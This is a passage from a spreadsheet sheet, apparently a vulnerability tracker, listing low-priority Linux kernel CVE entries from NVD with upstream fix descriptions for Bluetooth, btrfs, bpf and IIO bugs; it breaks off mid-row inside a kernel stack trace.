          <t>CVE-2026-90249</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: light: gp2ap002: Fix unbalanced runtime PM on repeated event writes
The IIO core does not filter duplicate writes to the event enable
attribute, so writing the same value twice invokes
write_event_config() twice. Enabling twice leaks a runtime PM
reference, preventing the device from ever suspending again;
disabling twice underflows the usage count and triggers a
"Runtime PM usage count underflow" warning.
Bail out early when the requested state matches the current state.
While at it, switch to pm_runtime_resume_and_get() so a failed
resume is propagated to userspace instead of silently marking the
event enabled.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90249</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90250</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, cgroup: Fix storage null-ptr-deref after replacing prog
Syzkaller reported a storage null-ptr-deref issue after replacing prog.
This occurs in the following scenario:
1. prog A, an empty prog, is attached to a cgrp.
2. prog B uses BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE and calls the
   bpf_get_local_storage helper.
3. link_update is called to replace prog A with prog B.
The reason is that __cgroup_bpf_replace fails to alloc and assign the
required cgrp storage for the incoming replacement prog. Consequently,
the new prog inherits an uninit storage, leading to null-ptr-deref panic
when kick the new prog.
Fix this by rejecting a link update if new_prog's cgroup storage is
incompatible with link-&gt;prog.</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90250</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90251</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MSFT: validate evt_prefix_len against the response length
read_supported_features() only checks that the response covers the fixed
part of struct msft_rp_read_supported_features, which is 11 bytes:
	if (skb-&gt;len &lt; sizeof(*rp)) {
		bt_dev_err(hdev, "MSFT supported features length mismatch");
		goto failed;
	}
evt_prefix[] is a flexible array member and rp-&gt;evt_prefix_len is an
unvalidated u8 taken straight out of that response, so
	msft-&gt;evt_prefix = kmemdup(rp-&gt;evt_prefix, rp-&gt;evt_prefix_len,
				   GFP_KERNEL);
copies up to 255 bytes from a reply that may have carried none of them.
What is copied is data the controller never sent, and it is then used to
match incoming vendor events in msft_vendor_evt().
This is not an out-of-bounds access. An skb data allocation always has
at least SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) bytes past the
payload, which is more than the 255 byte maximum, so the read stays
inside the allocation and KASAN does not report it. It is still a read
of bytes the host was never given, with the length fully controlled by
the controller.
Reject a response that is too short for the prefix it declares.
Verified with an emulated controller over /dev/vhci on a KASAN kernel,
with vhci made to advertise an MSFT opcode the way btintel, btqca, btmtk
and btrtl do unconditionally. A reply of exactly 11 bytes declaring
evt_prefix_len = 255 reaches kmemdup and copies 255 bytes
("skb-&gt;len=11 evt_prefix_len=255", with the copied buffer dumped); since
the reply ends at the fixed part, all 255 come from past the end of the
response. No KASAN report is produced, as expected from the allocation
slack described above. With this patch the response is rejected with
"MSFT event prefix length mismatch" and msft-&gt;evt_prefix is left unset.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90251</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90252</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2026-09-17</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MGMT: free the HCI command when it is cancelled
mgmt_hci_cmd_sync() queues the pending command with a NULL destroy
callback, so it is only freed if send_hci_cmd_sync() runs. A cancelled
entry is leaked, as _hci_cmd_sync_cancel_entry() does not release
entry-&gt;data when there is no destroy callback, and hci_cmd_sync_clear()
cancels every pending entry when the controller is unregistered. Nothing
else reclaims it either: mgmt_pending_new() does not put the command on
hdev-&gt;mgmt_pending.
The leak also pins the socket reference taken by mgmt_pending_new(), so
the mgmt socket is never released.
Free the command from a destroy callback. The now-empty done label is
replaced by a direct return.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90252</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90253</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2026-09-17</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: MGMT: free the mesh send cancel command when it is cancelled
mesh_send_cancel() queues the pending command with a NULL destroy
callback, so it is only freed if send_cancel() runs. A cancelled entry is
leaked, as _hci_cmd_sync_cancel_entry() does not release entry-&gt;data when
there is no destroy callback, and hci_cmd_sync_clear() cancels every
pending entry when the controller is unregistered. Nothing else reclaims
it either: mgmt_pending_new() does not put the command on
hdev-&gt;mgmt_pending.
The leak also pins the socket reference taken by mgmt_pending_new(), so
the mgmt socket is never released.
Free the command from a destroy callback.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90253</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90254</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_sync: free the advertising instance on the failure and cancel paths
adv_timeout_expire() hands a kmalloc()ed instance byte to
hci_cmd_sync_queue() with a NULL destroy callback, and only
adv_timeout_expire_sync() frees it. That leaks on two paths:
 - the return value is not checked, and hci_cmd_sync_queue() does not
   take ownership when it fails (-ENETDOWN, -ENODEV, -ENOMEM);
 - a cancelled entry is not released, as _hci_cmd_sync_cancel_entry()
   does not free entry-&gt;data when there is no destroy callback.
   hci_cmd_sync_clear() cancels every pending entry when the controller
   is unregistered.
Free the buffer from a destroy callback, and in the caller when the entry
could not be queued at all.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90254</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90255</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_conn: fix the SCO setup context lifetime
hci_setup_sync() queues a conn_handle_t with a NULL destroy callback, so
the context is only freed if hci_enhanced_setup_sync() actually runs. An
entry that is cancelled instead is leaked, as
_hci_cmd_sync_cancel_entry() does not release entry-&gt;data when there is
no destroy callback, and hci_cmd_sync_clear() cancels every pending entry
when the controller is unregistered.
The context also stores a bare hci_conn pointer, so the connection can be
freed while the work is queued. The dequeue in hci_conn_del() does not
cover it either, as it matches on entry-&gt;data == conn and entry-&gt;data is
the wrapper here. Same problem as commit 2f5d635ad590 ("Bluetooth:
hci_sync: hold conn in hci_connect_acl/le_sync() callbacks").
Hold the connection and release both from a destroy callback. The
submission failure path drops both, since hci_cmd_sync_submit() does not
call the destroy callback when it fails to queue.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90255</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90256</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: use proto_lock for l2cap_data to fix l2cap_disconn_ind
hci_conn::l2cap_data is accessed without locks in l2cap_disconn_ind via
hci_conn_timeout (disc_work) -&gt; hci_proto_disconn_ind -&gt;
l2cap_disconn_ind.  This is UAF if the l2cap_conn is deleted
concurrently.
disc_work is disabled sync in hci_conn_del(), so we cannot take
hci_dev_lock in disc_work.
Fix by using proto_lock to guard l2cap_data, in addition to hdev-&gt;lock
which is held in other access paths.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90256</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90257</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2026-09-17</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: virtio_bt: avoid OOB read of build info string
The virtbt_setup_zephyr() sends the Zephyr vendor command 0xfc08 (Read
Build Information) and hands the response to bt_dev_info() and
hci_set_fw_info() as a "%s" string starting at skb-&gt;data + 1, without
checking the length. A backend that answers with status only leaves that
pointer past the end of the received data, so the walk reads adjacent
slab memory until it meets a NUL. Those bytes reach the kernel log and
the firmware-info debugfs file.
To fix this, print the string with a bounded "%.*s" limited to
skb-&gt;len - 1. A short or unterminated response then prints as much as
arrived instead of failing setup.
This mirrors commit dd068ef04412 ("Bluetooth: bpa10x: avoid OOB read of
revision string in bpa10x_setup()"), which fixed the identical pattern.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90257</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90258</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2026-09-17</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: airoha: add missed IRQ resource helpers
Without hooking .irq_request_resources, gpiolib cannot set
GPIOD_FLAG_USED_AS_IRQ. This breaks pin direction locking and can allow
userspace or another driver to reconfigure an active IRQ pin as an output</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90258</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90259</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2026-09-17</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: qgroup: fix a wrong length calculation in qgroup_free_reserved_data()
In that function, we round down the start position and round up the
ending position.
But during the calculation of @len, we use "round_up(start + len,
sectorsize)", which is the rounded up end position, not the rounded up
length.
Which results a much larger length, and later we are still using
"start + len", which is completely incorrect.
Fix it by declaring a local @aligned_start and @aligned_len and use them
instead.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90259</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90260</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2026-09-17</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: don't clobber the extent buffer when zeroing it out
On a zoned filesystem a freed-but-still-dirty tree block is written out
as zeros (EXTENT_BUFFER_ZONED_ZEROOUT) only to keep the zone write
pointer advancing. btree_csum_one_bio() implemented this by memzeroing
the extent buffer's own folios before submission.
That destroys the in-memory buffer while it may still be referenced. In
particular btrfs_free_tree_block() can run on it afterwards and reads
the header to add a delayed reference; once the header has been zeroed
it frees bytenr 0 and corrupts the extent tree (the
btrfs_header_bytenr(buf) != 0 ASSERT in btrfs_free_tree_block(), or an
"unable to find ref" abort). It is flaky and reproduces under fsstress,
e.g. generic/461 and generic/013.
Write the zeros to disk from the shared zero page instead and leave the
extent buffer content untouched, so any later reference - including the
delayed reference from btrfs_free_tree_block() - still sees a valid
header. end_bbio_meta_write() now clears writeback on the buffer's own
folios, as the bio no longer carries them.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90260</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90261</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="inlineStr"/>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr"/>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr"/>
      <c r="M629" s="5" t="inlineStr"/>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: flush active metadata block group at btree_writepages() start
btree_writepages() writes the btree inode's dirty metadata in ascending
logical address order. On a zoned filesystem only one metadata and one
system block group is active for writing at a time, and
check_bg_is_active() (via btrfs_check_meta_write_pointer()) pivots the
active block group as writeback moves from one block group to the next.
If the active block group sits at a higher logical address than another
block group that also holds dirty metadata, the ascending walk reaches
the lower one first and, to write it, has to finish the active block
group and activate the lower one. It cannot finish a block group that
still has unsent IO, and during WB_SYNC_ALL &amp;&amp; !for_sync (commit)
writeback it deliberately refuses to wait for that IO under
fs_info-&gt;zoned_meta_io_lock, as that can deadlock. The pivot thus cannot
issue the submission itself either, so it gives up:
btrfs_check_meta_write_pointer() returns -EAGAIN, which
btrfs_write_and_wait_transaction() treats as fatal and aborts the
transaction, forcing the filesystem read-only. This happens
intermittently under metadata-heavy relocation (e.g. fstests btrfs/187).
Flush the active metadata and system block groups at the start of
btree_writepages(), under the fs_info-&gt;zoned_meta_io_lock it already
holds, so they have no unsent IO left and the later pivot can finish
them and make forward progress.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90261</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90262</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr"/>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: retry verity reads for not-uptodate Merkle folios
btrfs_read_merkle_tree_page() can find a folio in the mapping that is not
uptodate.  After taking the folio lock, the current code treats that state
as a read error and returns -EIO.
That can make a previous transient read failure sticky.  If the failed read
left a not-uptodate folio in the mapping, later callers find that folio and
fail instead of retrying the read.
Keep the existing page-cache insertion and locking order, but retry the
Merkle item read when a not-uptodate folio is found in the mapping.  Also
unlock the folio when read_key_bytes() fails so that a later caller can
lock it and retry the read.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90262</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90263</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: check if root is readonly when setting posix acl
For a filesystem which has btrfs read-only property set to true, all
write operations including acl and xattr should be denied. However, acl
can still be set even if btrfs ro property is true.
This happens because no function on the set_acl code path checks the root
is readonly or not. It was checked in btrfs_setxattr_trans() but got
removed in commit 353c2ea735e4 ("btrfs: remove redundant readonly root
check in btrfs_setxattr_trans")
That commit didn't check if all the callers properly check the root's
read-only flag. A previous fix is commit b51111271b03 ("btrfs: check if
root is readonly while setting security xattr").
Always check if the root is read-only before performing the set acl
operation.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90263</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90264</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: always wait for ordered extents to avoid OE races
[BUG]
Syzbot reported a bug that there can be conflicting OEs for the same
range:
  BTRFS critical (device loop4): panic in insert_ordered_extent:264: overlapping ordered extents, existing oe file_offset 16384 num_bytes 430080 flags 0x1089, new oe file_offset 16384 num_bytes 430080 flags 0x80 (errno=-17 Object alrea[  179.162726][ T6897] BTRFS critical (device loop4): panic in insert_ordered_extent:264: overlapping ordered extents, existing oe file_offset 16384 num_bytes 430080 flags 0x1089, new oe file_offset 16384 num_bytes 430080 flags 0x80 (errno=-17 Object already exists)
  ------------[ cut here ]------------
  kernel BUG at fs/btrfs/ordered-data.c:264!
  Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/09/2026
  RIP: 0010:btrfs_alloc_ordered_extent+0x943/0xad0
  Call Trace:
   &lt;TASK&gt;
   cow_file_range+0x744/0x12a0
   fallback_to_cow+0x5ea/0xa00
   run_delalloc_nocow+0x110c/0x17a0
   btrfs_run_delalloc_range+0xbe4/0x1c20
   writepage_delalloc+0x104d/0x1ba0
   btrfs_writepages+0x1667/0x28b0
   do_writepages+0x338/0x560
   filemap_fdatawrite_range+0x1f2/0x300
   btrfs_fdatawrite_range+0x54/0xf0
   btrfs_direct_write+0x6a0/0xc30
   btrfs_do_write_iter+0x329/0x790
   do_iter_readv_writev+0x624/0x8d0
   vfs_writev+0x34c/0x990
   __se_sys_pwritev2+0x17a/0x2a0
   do_syscall_64+0x174/0x580
